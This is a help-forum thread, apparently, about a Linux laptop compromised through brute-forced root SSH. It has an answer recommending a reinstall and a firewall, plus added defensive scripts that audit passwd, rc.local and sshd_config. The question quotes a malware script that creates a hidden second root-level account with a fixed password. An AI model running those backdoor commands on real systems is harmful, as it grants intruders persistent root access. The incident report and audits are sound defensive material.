How to deal with malware on my laptop?
I am fairly certain that my Ubuntu 13.10 laptop is infected with some sort of malware.
Every once in a while, I find a process /lib/sshd (owned by root) running and consuming lots of cpu. It is not the sshd server which runs /usr/sbin/sshd.
The binary has --wxrw-rwt permissions and it generates and spawns scripts in the /lib directory. A recent one is named 13959730401387633604 and it does the following:
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
The gusr user was created by the malware independently, and then the chpasswd hangs while consuming 100% cpu.
So far, I've identified that the gusr user was additionally added to these files in /etc/:
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
It seems like the malware made copies of all these files with the "-" suffix. The full list of /etc/ files that were modified by root is available here.
In addition, the /etc/hosts file was changed to this.
The /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file!
I've removed the user, removed the files, killed the tree of processes, changed my passwords and removed the ssh public keys.
I am aware that I am basically screwed, and I will most likely reinstall the whole system. Nevertheless, since I login to several other machines, it would be good to at least attempt to remove it, and figure out how I got it. Any suggestions on how to go about this would be appreciated.
It seems like they got in on March 25 by brute-forcing root login. I had no idea that root ssh is enabled by default in Ubuntu. I disabled it and put up denyhosts.
The login was from 59.188.247.236, somewhere in Hong Kong apparently.
I got the laptop from EmperorLinux, and they enabled root access. If you have one of those and you're running sshd beware.
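The checks below are an added example, not something from the question or its answers. They turn the three symptoms described above into repeatable tests: an extra account sharing UID 0 (what `useradd -g 0 -u 0 -o gusr` produces), the delta between /etc/passwd and the passwd- backup that useradd/chpasswd keep, and active commands in rc.local beyond the stock `exit 0`. Every check takes a file path, and the sample passwd/passwd-/rc.local files are constructed inline so the script runs offline; on a live system you would point it at /etc/passwd, /etc/passwd- and /etc/rc.local.

```shell
#!/bin/sh
# Added example: post-incident account and persistence checks. All inputs are
# file paths so the functions can be exercised on the constructed samples below.

# Print every account that shares UID 0 with root. A second UID 0 account is
# exactly what "useradd -o -u 0" creates and is never legitimate on a laptop.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print the names of accounts whose passwd line is present in the current file
# but not in the "-" backup, i.e. what the most recent account change added or
# altered. $1 = backup (passwd-), $2 = current (passwd).
changed_accounts_since_backup() {
    grep -v -x -F -f "$1" "$2" | cut -d: -f1 || :
}

# Print the active (non-comment, non-blank) lines of an rc.local-style file,
# minus the stock "exit 0". Ubuntu's default rc.local runs nothing else, so any
# output here was added by someone.
rc_local_active_commands() {
    grep -v -E '^[[:space:]]*(#|$)' "$1" | grep -v -x 'exit 0' || :
}

# ---- constructed samples (not real system files) ----
SAMPLE_DIR="$(mktemp -d)"
PASSWD_OLD="$SAMPLE_DIR/passwd-"
PASSWD_NEW="$SAMPLE_DIR/passwd"
RC_LOCAL="$SAMPLE_DIR/rc.local"

# Backup as it looked before the intrusion.
cat > "$PASSWD_OLD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF

# Same file after a "useradd -g 0 -u 0 -o gusr" run.
cat > "$PASSWD_NEW" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
gusr:x:0:0::/home/gusr:/bin/sh
EOF

# Stock rc.local comments plus one appended start-up line.
cat > "$RC_LOCAL" <<'EOF'
#!/bin/sh -e
#
# rc.local
# By default this script does nothing.
/lib/sshd
exit 0
EOF

# Stand-alone run: each check prints its findings for the samples.
echo "accounts sharing UID 0 with root:"
extra_uid0_accounts "$PASSWD_NEW"
echo "accounts changed since the passwd- backup:"
changed_accounts_since_backup "$PASSWD_OLD" "$PASSWD_NEW"
echo "commands rc.local would run:"
rc_local_active_commands "$RC_LOCAL"
```

The passwd/passwd- comparison is the quickest way to see what the last useradd or chpasswd call touched, because those tools write the `-` backup before modifying the live file; the same pairing exists for shadow, group and gshadow.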
Solution 1:
First, get that machine off the network now!
Second, why did you have the root account enabled? You really shouldn't enable the root account unless you have a very good reason to do so.
Thirdly, yes, the only way to be sure you're clean is to do a clean install. It's also advised that you start fresh and don't go back to a backup, as you can never be sure when it all started.
I also suggest that you set up a firewall in your next install and deny all incoming connections:
sudo ufw default deny incoming
and then allow ssh with:
sudo ufw allow ssh
and DON'T enable the root account! Certainly make sure that root ssh login is disabled.
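As an added example, not part of the answer above, the script below audits an sshd_config the way sshd itself reads it, so that "root ssh login is disabled" can be verified rather than assumed after the reinstall. It resolves a keyword's effective global value: the first occurrence wins and later duplicates are ignored, comment lines are skipped, keywords are case-insensitive, and anything after the first Match line is conditional rather than global. The two configs are constructed samples; the assumption that an absent PermitRootLogin means "yes" matches the OpenSSH shipped with Ubuntu 13.10 (newer releases default to prohibit-password, which still admits root with a key).

```shell
#!/bin/sh
# Added example: resolve the effective global value of an sshd_config keyword.
# $1 = config file path, $2 = keyword (case-insensitive). Prints the value, or
# "absent" when the global section never sets it.
sshd_global_directive() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        /^[[:space:]]*#/ || NF == 0 { next }        # comments and blank lines
        tolower($1) == "match"      { exit }        # global section ends here
        tolower($1) == key          { print tolower($2); found = 1; exit }
        END { if (!found) print "absent" }          # runs after either exit
    ' "$1"
}

# Exit status 0 when root can still log in over SSH under this config.
# Only an explicit "no" closes the door; "absent" is treated as "yes"
# (the OpenSSH 6.x default) and without-password/prohibit-password still
# admit root with a key.
root_ssh_login_possible() {
    case "$(sshd_global_directive "$1" PermitRootLogin)" in
        no) return 1 ;;
        *)  return 0 ;;
    esac
}

# ---- constructed samples (not real system files) ----
WEAK_CFG="$(mktemp)"
HARD_CFG="$(mktemp)"

# The shape that allows a password brute-force against root. The commented
# "no" and the later duplicate "no" are both ignored by sshd.
cat > "$WEAK_CFG" <<'EOF'
Port 22
#PermitRootLogin no
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no
EOF

# Hardened version for the fresh install. The Match block only applies to the
# documentation address range and does not change the global setting.
cat > "$HARD_CFG" <<'EOF'
Port 22
PermitRootLogin no
PasswordAuthentication no
Match Address 192.0.2.0/24
    PasswordAuthentication yes
EOF

# Stand-alone run: report both configs.
for cfg in "$WEAK_CFG" "$HARD_CFG"; do
    echo "$cfg: PermitRootLogin=$(sshd_global_directive "$cfg" PermitRootLogin)" \
         "PasswordAuthentication=$(sshd_global_directive "$cfg" PasswordAuthentication)"
    if root_ssh_login_possible "$cfg"; then
        echo "  root can log in over ssh"
    else
        echo "  root ssh login disabled"
    fi
done
```

Run it against /etc/ssh/sshd_config on the new install and then reload sshd; pairing `PermitRootLogin no` with `PasswordAuthentication no` removes the password-guessing surface that let the March 25 login succeed.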